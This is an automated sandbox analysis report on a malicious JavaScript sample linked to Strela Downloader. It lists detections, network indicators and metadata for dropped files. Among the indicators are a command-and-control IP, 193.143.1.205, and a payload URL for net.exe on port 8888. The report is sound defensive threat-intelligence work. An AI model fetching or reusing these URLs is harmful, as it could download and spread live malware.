dnsIp10 40 193.143.1.205, 49704, 49705, 80 BITWEB-ASRU unknown 19->40 36 C:\Users\user\AppData\Local\...\invoice.pdf, PDF 19->36 dropped 58 Gathers information about network shares 23->58 30 net.exe 1 23->30         started        32 AcroCEF.exe 106 26->32         started        file11 signatures12 process13 process14 34 AcroCEF.exe 2 32->34         started       

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    1475127682155276.js10%VirustotalBrowse
    1475127682155276.js8%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalse
      high
      x1.i.lencr.org
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        http://193.143.1.205/invoice.phpfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://193.143.1.205:8888/temnet.exe, 00000007.00000002.2124383639.000001C0D4538000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://g.live.com/odclientsettings/Prod/C:edb.log.9.dr, qmgr.db.9.drfalse
              high
              http://crl.ver)svchost.exe, 00000009.00000002.3359525408.0000018F90800000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.8.drfalse
                  high
                  https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000009.00000003.2123576965.0000018F906F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drfalse
                    high
                    http://193.143.1.205:8888/net.exe, 00000007.00000003.2123672131.000001C0D456A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2124471907.000001C0D458F000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      193.143.1.205
                      unknownunknown
                      57271BITWEB-ASRUtrue
                      IP
                      127.0.0.1
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1591624
                      Start date and time:2025-01-15 08:12:10 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 5m 11s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:15
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:1475127682155276.js
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.expl.evad.winJS@27/55@1/2
                      EGA Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .js
                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded IPs from analysis (whitelisted): 184.28.88.176, 34.237.241.83, 54.224.241.105, 50.16.47.176, 18.213.11.84, 172.64.41.3, 162.159.61.3, 184.28.90.27, 199.232.210.172, 23.209.209.135, 2.16.168.125, 2.16.168.107, 2.16.168.105, 13.107.246.45, 4.245.163.56, 23.47.168.24
                      • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, geo2.adobe.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      TimeTypeDescription
                      02:13:06API Interceptor21x Sleep call for process: powershell.exe modified
                      02:13:10API Interceptor1x Sleep call for process: net.exe modified
                      02:13:10API Interceptor2x Sleep call for process: svchost.exe modified
                      02:13:22API Interceptor2x Sleep call for process: AcroCEF.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      193.143.1.20514957144702878221204.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205:8888/
                      1579614525244583223.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205:8888/
                      35491083472324549.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205:8888/
                      28236151432955330765.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205:8888/
                      17201670993971103.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205:8888/
                      2330118683179179335.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205:8888/
                      577119676170175151.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205:8888/
                      106714464113327088.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205:8888/
                      3062912729105825642.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205:8888/
                      1684156262492114486.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205:8888/
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      bg.microsoft.map.fastly.netInvdoc80.pdfGet hashmaliciousHTMLPhisherBrowse
                      • 199.232.210.172
                      Reversed order 24-25.pdfGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      wmnq39xe8J.dllGet hashmaliciousWannacryBrowse
                      • 199.232.214.172
                      Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                      • 199.232.210.172
                      tTbeoLWNhb.dllGet hashmaliciousWannacryBrowse
                      • 199.232.214.172
                      Document-01-16-25.pdfGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      Eastern Contractors Corporation Contract and submittal document.emlGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      v9xYj92wR3.dllGet hashmaliciousWannacryBrowse
                      • 199.232.214.172
                      https://securityalert-corporate.com/click/f288bff9-842d-4e34-8d2d-41ad20e48e9dGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      FjSrGs0AE2.dllGet hashmaliciousWannacryBrowse
                      • 199.232.214.172
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      BITWEB-ASRU14957144702878221204.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205
                      1579614525244583223.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205
                      35491083472324549.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205
                      28236151432955330765.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205
                      17201670993971103.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205
                      2330118683179179335.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205
                      577119676170175151.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205
                      106714464113327088.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205
                      3062912729105825642.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205
                      1684156262492114486.jsGet hashmaliciousStrela DownloaderBrowse
                      • 193.143.1.205
                      No context
                      No context
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.8307018394689994
                      Encrypted:false
                      SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDugN:gJjJGtpTq2yv1AuNZRY3diu8iBVqFn
                      MD5:48F402C87C76E8C4FF5197F35DBFF658
                      SHA1:5BF54F057A03ACBBFBCC8BA789363E31D1D32E6E
                      SHA-256:32185C29973E619E3AD14D22562EFAD480CF4B9C6DA6B6A22160EB267CB1843A
                      SHA-512:2D08B239785E323E099A42CAE387B1D4EB00E96182E29750D13A60406DD1DAD11301AB4EEA35F5BF404F78C17F5654AD714A486C10827235C840131DAB7432C7
                      Malicious:false
                      Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                      Process:C:\Windows\System32\svchost.exe
                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe5ed128d, page size 16384, DirtyShutdown, Windows version 10.0
                      Category:dropped
                      Size (bytes):1310720
                      Entropy (8bit):0.6585494581666045
                      Encrypted:false
                      SSDEEP:1536:JSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Jaza9v5hYe92UOHDnAPZ4PZf9h/9h
                      MD5:C757F4CEF13C747780B101AEB6DB6A64
                      SHA1:B340B82350035A0CF210CD51AEF5314CE3CEE77A
                      SHA-256:7BE22C3C26A5A4CE3560FD8021FCA7A795D5C8902DC85BCD7984F8A6F8E68587
                      SHA-512:2FED22EE33A487ADA6034D7578907A91567E1DEDCA0EE1E3FBA46A07ED793BB7B58B13E46F203351A239C5D52EAF61669078FED6E2BE7B665A66F4A7454F4963
                      Malicious:false
                      Preview:....... ...............X\...;...{......................0.z..........{.......}..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{..................................e.D......}..................I.Y......}...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\svchost.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):16384
                      Entropy (8bit):0.07925197019192107
                      Encrypted:false
                      SSDEEP:3:VYeYRqyekGuAJkhvekl1tZ/tAllrekGltll/SPj:Vz/ytrxlfLAJe3l
                      MD5:6E2EFBD0A5CD17B3B6A1B3869D226AE8
                      SHA1:99A7299068AF5A60D2FB48B9A8A03AEC25A669B4
                      SHA-256:3BAE96B8EB427740248090B653394377293E62A52F3993962BB0789E0F9885D6
                      SHA-512:BA0EA02EC130552631E004BE0F06B78648CC8EFD3D4735A06FAA0306CB64F71C8FC337FBEA4732BDA4406CE051083630E65AA73EFEF95227148BEE4599150DEE
                      Malicious:false
                      Preview:..s/.....................................;...{.......}.......{...............{.......{...XL......{..................I.Y......}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.188180365425627
                      Encrypted:false
                      SSDEEP:6:iOuvTusM+q2P92nKuAl9OmbnIFUt4vfJdmZmwivfJdpMVkwO92nKuAl9OmbjLJ:76M+v4HAahFUt2A/sjMV5LHAaSJ
                      MD5:731B4402A57D3D9E1C04D8BF9D66FF96
                      SHA1:EE8158C75B1B219303FE02D417D96EE718954623
                      SHA-256:DEC88ABFF9B1A65798898DFF9CC378EDDB9CCB560B65FABE0F4B0B144416C214
                      SHA-512:5CDE9C94AB04643E1035DBC8127287873539B0ECD09E5CD12DB5520DA866F6F45AD28360726249C738427073CE9E9B661F0DEFDCBAD1E9FD5E4ED95E0318EFA2
                      Malicious:false
                      Preview:2025/01/15-02:13:09.865 1c8c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/15-02:13:09.869 1c8c Recovering log #3.2025/01/15-02:13:09.869 1c8c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.188180365425627
                      Encrypted:false
                      SSDEEP:6:iOuvTusM+q2P92nKuAl9OmbnIFUt4vfJdmZmwivfJdpMVkwO92nKuAl9OmbjLJ:76M+v4HAahFUt2A/sjMV5LHAaSJ
                      MD5:731B4402A57D3D9E1C04D8BF9D66FF96
                      SHA1:EE8158C75B1B219303FE02D417D96EE718954623
                      SHA-256:DEC88ABFF9B1A65798898DFF9CC378EDDB9CCB560B65FABE0F4B0B144416C214
                      SHA-512:5CDE9C94AB04643E1035DBC8127287873539B0ECD09E5CD12DB5520DA866F6F45AD28360726249C738427073CE9E9B661F0DEFDCBAD1E9FD5E4ED95E0318EFA2
                      Malicious:false
                      Preview:2025/01/15-02:13:09.865 1c8c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/15-02:13:09.869 1c8c Recovering log #3.2025/01/15-02:13:09.869 1c8c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):338
                      Entropy (8bit):5.082723225167753
                      Encrypted:false
                      SSDEEP:6:iOuvY44q2P92nKuAl9Ombzo2jMGIFUt4vjNJZmwiviDkwO92nKuAl9Ombzo2jMmd:7Dv4HAa8uFUtI/v5LHAa8RJ
                      MD5:9BBF72910066DA5698F77B8C88571096
                      SHA1:1CA8926EEEBF9A89CEB7AF0444DEF0F8BA1C2D10
                      SHA-256:3B4DC80FF01454AF4A35B6E379BCE2DE82C8E7C6FA115419FC61D86C55357C9D
                      SHA-512:CE8809964B662E8C05B89C31265E04F7880C0B1FDFF5DECE805F9B63861C09D5CC25283E0E8D966A0BF52CE15DA695265113A0D83B009CC9E2EAC4156D04CD30
                      Malicious:false
                      Preview:2025/01/15-02:13:10.019 1d04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/15-02:13:10.020 1d04 Recovering log #3.2025/01/15-02:13:10.021 1d04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):338
                      Entropy (8bit):5.082723225167753
                      Encrypted:false
                      SSDEEP:6:iOuvY44q2P92nKuAl9Ombzo2jMGIFUt4vjNJZmwiviDkwO92nKuAl9Ombzo2jMmd:7Dv4HAa8uFUtI/v5LHAa8RJ
                      MD5:9BBF72910066DA5698F77B8C88571096
                      SHA1:1CA8926EEEBF9A89CEB7AF0444DEF0F8BA1C2D10
                      SHA-256:3B4DC80FF01454AF4A35B6E379BCE2DE82C8E7C6FA115419FC61D86C55357C9D
                      SHA-512:CE8809964B662E8C05B89C31265E04F7880C0B1FDFF5DECE805F9B63861C09D5CC25283E0E8D966A0BF52CE15DA695265113A0D83B009CC9E2EAC4156D04CD30
                      Malicious:false
                      Preview:2025/01/15-02:13:10.019 1d04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2025/01/15-02:13:10.020 1d04 Recovering log #3.2025/01/15-02:13:10.021 1d04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):508
                      Entropy (8bit):5.0534180424655215
                      Encrypted:false
                      SSDEEP:12:YH/um3RA8sqYsBdOg2H7fcaq3QYiubxnP7E4T3OF+:Y2sRds0dMHC3QYhbxP7nbI+
                      MD5:8CFFF7705576FCB082D0DB5706FB8ECE
                      SHA1:1E3125EE0F0AB3483FB2A54AC6CCF8EECF1C43D3
                      SHA-256:B5687641F82158916D5AFBFC73D66DE554343355D9F0FA5FC62A149EFBC50779
                      SHA-512:94189130AF7905F1AA85D009A1EC90BAF83F4B5E8825EFA47199E5F8552BDF1FCFBB655EC2A9E63F280BD74F7E81E3C2A194BF1FA87A5FDD6FC6FF79FF8663C9
                      Malicious:false
                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381485202513769","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":121614},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:JSON data
                      Category:modified
                      Size (bytes):508
                      Entropy (8bit):5.0534180424655215
                      Encrypted:false
                      SSDEEP:12:YH/um3RA8sqYsBdOg2H7fcaq3QYiubxnP7E4T3OF+:Y2sRds0dMHC3QYhbxP7nbI+
                      MD5:8CFFF7705576FCB082D0DB5706FB8ECE
                      SHA1:1E3125EE0F0AB3483FB2A54AC6CCF8EECF1C43D3
                      SHA-256:B5687641F82158916D5AFBFC73D66DE554343355D9F0FA5FC62A149EFBC50779
                      SHA-512:94189130AF7905F1AA85D009A1EC90BAF83F4B5E8825EFA47199E5F8552BDF1FCFBB655EC2A9E63F280BD74F7E81E3C2A194BF1FA87A5FDD6FC6FF79FF8663C9
                      Malicious:false
                      Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381485202513769","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":121614},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G","CAYSABiAgICA+P////8B":"Offline"}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4099
                      Entropy (8bit):5.240310449653802
                      Encrypted:false
                      SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUlRBtytvW1n8:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLT
                      MD5:6304C5334FE1DFCA34EDDC6ED8EC887B
                      SHA1:222F8F99D06936C8FC6B60C4A2436B2609427CC9
                      SHA-256:3458312264C4F22E87183A40FE112DF45444984CC31DE1851461729A95022A90
                      SHA-512:BF69D3B75F6A8AFA6D763E4F95AA8E1686EEE32081985538CCFB85322F162F195EF3CE476BE47AC7B8B769B071F25DF99E1A0C18B77B76B79DBDA994E1C166AC
                      Malicious:false
                      Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):326
                      Entropy (8bit):5.09374000170039
                      Encrypted:false
                      SSDEEP:6:iOuvPc4q2P92nKuAl9OmbzNMxIFUt4vPlLJZmwivPkLDkwO92nKuAl9OmbzNMFLJ:78Lv4HAa8jFUt+b/wU5LHAa84J
                      MD5:314FD833C868395BBA98FD5E1F4406B2
                      SHA1:F9AE245383C03C22BE9E7CFCADB049A643F56733
                      SHA-256:DAE08B68CBF5F67C1B39232DA0C140D1EAA60016095B1BE556977B45ECE6E144
                      SHA-512:B624F3D46A63901A5232A87BE97B9245DADB7E064F627A92A8C79AB6910B973EB11A7E461CED211EFA0C68D728A67411D0127C81BB229F95EF07373DF8C88146
                      Malicious:false
                      Preview:2025/01/15-02:13:10.131 1d04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/15-02:13:10.132 1d04 Recovering log #3.2025/01/15-02:13:10.133 1d04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):326
                      Entropy (8bit):5.09374000170039
                      Encrypted:false
                      SSDEEP:6:iOuvPc4q2P92nKuAl9OmbzNMxIFUt4vPlLJZmwivPkLDkwO92nKuAl9OmbzNMFLJ:78Lv4HAa8jFUt+b/wU5LHAa84J
                      MD5:314FD833C868395BBA98FD5E1F4406B2
                      SHA1:F9AE245383C03C22BE9E7CFCADB049A643F56733
                      SHA-256:DAE08B68CBF5F67C1B39232DA0C140D1EAA60016095B1BE556977B45ECE6E144
                      SHA-512:B624F3D46A63901A5232A87BE97B9245DADB7E064F627A92A8C79AB6910B973EB11A7E461CED211EFA0C68D728A67411D0127C81BB229F95EF07373DF8C88146
                      Malicious:false
                      Preview:2025/01/15-02:13:10.131 1d04 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2025/01/15-02:13:10.132 1d04 Recovering log #3.2025/01/15-02:13:10.133 1d04 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:Certificate, Version=3
                      Category:dropped
                      Size (bytes):1391
                      Entropy (8bit):7.705940075877404
                      Encrypted:false
                      SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                      MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                      SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                      SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                      SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                      Malicious:false
                      Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                      Category:dropped
                      Size (bytes):71954
                      Entropy (8bit):7.996617769952133
                      Encrypted:true
                      SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                      MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                      SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                      SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                      SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                      Malicious:false
                      Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):192
                      Entropy (8bit):2.736068239839641
                      Encrypted:false
                      SSDEEP:3:kkFklnfyTPMlXfllXlE/HT8klA/tNNX8RolJuRdxLlGB9lQRYwpDdt:kK3T02T8s4NMa8RdWBwRd
                      MD5:26CDAE5FA7291DE2B9501455BCEA814D
                      SHA1:812768659D8124AABD9E3B5F2657BEA367AF49FA
                      SHA-256:B7E2577ABE45FA3A19ED24420E5E8B2D56159A5D44C9FF90E7DDCD3D6E02580A
                      SHA-512:D5EC28C2CB710321694C3D652E87CCDD74F0B91C92BBA2B2600B93876917D862F6BF8B90B9836244CB42DC0644F1FAE385F59D6D4DA83AEA8F1D04E1947B3470
                      Malicious:false
                      Preview:p...... ........T:W..g..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:data
                      Category:modified
                      Size (bytes):328
                      Entropy (8bit):3.247897867253901
                      Encrypted:false
                      SSDEEP:6:kKfGi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:XGdDImsLNkPlE99SNxAhUe/3
                      MD5:17613CDB8D121EBCFB75CA735B9DC57A
                      SHA1:E1349FDC9CC35085D09648C5D7D10647C850EF88
                      SHA-256:CC5424B5A11B3148B80D04B4A3A0C62B579D8CAC206E9D6550C7960BAE76AD13
                      SHA-512:D411282FDD4D4E2FA6F61D3C0C2B86CAD5C221F324D6369868FBD27D5F52691DF66F1C1201BCCACA50416CA4E9A172E90EE719A425D1F69398F842692B65C37D
                      Malicious:false
